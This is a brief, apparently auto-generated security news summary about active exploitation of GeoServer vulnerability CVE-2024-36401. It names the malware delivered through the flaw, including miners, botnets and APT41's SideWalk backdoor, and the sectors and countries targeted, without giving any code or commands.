September 6, 2024 at 11:45AM
A critical security flaw (CVE-2024-36401, CVSS 9.8) in OSGeo GeoServer GeoTools has been exploited in campaigns distributing cryptocurrency miners, botnet malware, and the SideWalk backdoor. The attacks target IT providers in India, U.S. tech firms, Belgian government entities, and telecom companies in Thailand and Brazil. CISA and Fortinet have detected and reported on these attacks, highlighting their global impact.
Key Takeaways from the Meeting Notes:
– There is a critical security vulnerability in OSGeo GeoServer GeoTools (CVE-2024-36401, CVSS score: 9.8) that has been actively exploited by malicious actors to deliver cryptocurrency miners, botnet malware, and a backdoor called SideWalk.
– The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to evidence of active exploitation.
– The attacks are targeting IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.
– The vulnerability has been observed to deliver a reverse proxy server known as GOREVERSE, which establishes a connection with a command-and-control (C2) server for post-exploitation activity.
– The exploit has also been used to distribute Condi, a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, with one retrieved from a fake website impersonating the Institute of Chartered Accountants of India (ICAI).
– A notable attack chain leveraging the flaw is associated with a Chinese threat actor tracked as APT41, which propagates an advanced Linux backdoor called SideWalk.
– The attack targets appear to be distributed across South America, Europe, and Asia, indicating a sophisticated and far-reaching campaign that may be exploiting vulnerabilities common to these markets or targeting specific industries prevalent in these areas.
This summary provides an overview of the security vulnerability in OSGeo GeoServer GeoTools and its exploitation for delivering various types of malware and cryptocurrency miners, as well as the specific industry and geographic targets of the attacks.